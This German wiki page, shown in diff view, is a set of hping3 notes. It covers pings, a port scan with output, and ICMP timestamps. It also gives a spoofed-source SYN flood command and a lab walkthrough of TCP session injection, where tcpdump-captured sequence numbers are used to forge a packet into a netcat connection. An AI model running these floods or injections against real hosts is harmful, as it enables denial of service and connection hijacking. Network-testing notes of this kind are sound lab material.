Hping3: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 59: | Zeile 59: | ||
=Port 50 aufsteigend= | =Port 50 aufsteigend= | ||
*hping3 -S -p ++50 dumm-host | *hping3 -S -p ++50 dumm-host | ||
| − | + | =Hacks= | |
*[[Pakete in Verbindung schicken]] | *[[Pakete in Verbindung schicken]] | ||
kann man in Verbindung mit ARP Spoofing benutzen | kann man in Verbindung mit ARP Spoofing benutzen | ||
Version vom 5. Juli 2021, 13:17 Uhr
Install
- apt-get install hping3
PING auf port 0
- hping3 192.168.244.52
SYN Ping
- hping3 192.168.244.52 -S -p 80 -w 2000 -d 1500 --fast
SYN tcp flag: -S Port 80: -p 80 TCP Window: -w 2000 Data Size: -d 1500 10Packets/s: --fast
SYN PUSH Ping
- hping3 192.168.244.52 -S -P -p 80
Push Flag: -P
ACK Ping
- hping3 192.168.244.52 -A -p 80
ACK Flag: -A
Scan
- hping3 -8 1-1000 -S 192.168.1.1
Scanning 192.168.1.1 (192.168.1.1), port 1-1000 1000 ports to scan, use -V to see all the replies +----+-----------+---------+---+-----+-----+-----+ |port| serv name | flags |ttl| id | win | len | +----+-----------+---------+---+-----+-----+-----+ 21 ftp : .S..A... 64 0 29200 44 22 ssh : .S..A... 64 0 29200 44 80 http : .S..A... 64 0 29200 44 139 netbios-ssn: .S..A... 64 0 29200 44 389 ldap : .S..A... 64 0 29200 44 443 https : .S..A... 64 0 29200 44 445 microsoft-d: .S..A... 64 0 29200 44 636 ldaps : .S..A... 64 0 29200 44 All replies received. Done. Not responding ports:
SYN Flooding gespoofte IP
- hping3 -a 10.0.10.104 -S 10.85.4.1 -p 631 --flood
Spoof IP: -a
timestamp
- hping3 -1 dumm-host --icmp-ts -c 1
HPING dumm-host (eth0 192.168.244.156): icmp mode set, 28 headers + 0 data bytes len=40 ip=192.168.244.156 ttl=64 id=15600 icmp_seq=0 rtt=7.9 ms ICMP timestamp: Originate=62740839 Receive=62740835 Transmit=62740835 ICMP timestamp RTT tsrtt=8 --- dumm-host hping statistic --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 7.9/7.9/7.9 ms
Port 50 aufsteigend
- hping3 -S -p ++50 dumm-host
Hacks
kann man in Verbindung mit ARP Spoofing benutzen
- Versuchsaufbau
- $CLIENT=10.0.10.103
- $OPFER=10.0.10.104
- $ANGREIFER=10.0.10.101
- $DSTPORT=2020
Angreifer
fenster client eins
- tcpdump
cardassia ~ # tcpdump -ni lan -S port 2020 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
fenster client zwei
- client
thomas.will@cardassia ~ $ nc 192.168.244.52 2020
fenster client eins
cardassia ~ # tcpdump -ni lan -S port 2020 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes 15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, options [mss 1460,sackOK,TS val 2268763 ecr 0,nop,wscale 7], length 0 15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, options [mss 1460,sackOK,TS val 193210349 ecr 2268763,nop,wscale 7], length 0 15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, options [nop,nop,TS val 2268763 ecr 193210349], length 0
fenster client drei
datei erstellen 10 bytes mit Umbruch
cardassia ~ # echo "hallo tux" > data.dat cardassia ~ # hping3 -s 58257 -p 2020 -A -d 10 -E data.dat -c 1 -M 1758983239 -L 963043880 192.168.244.52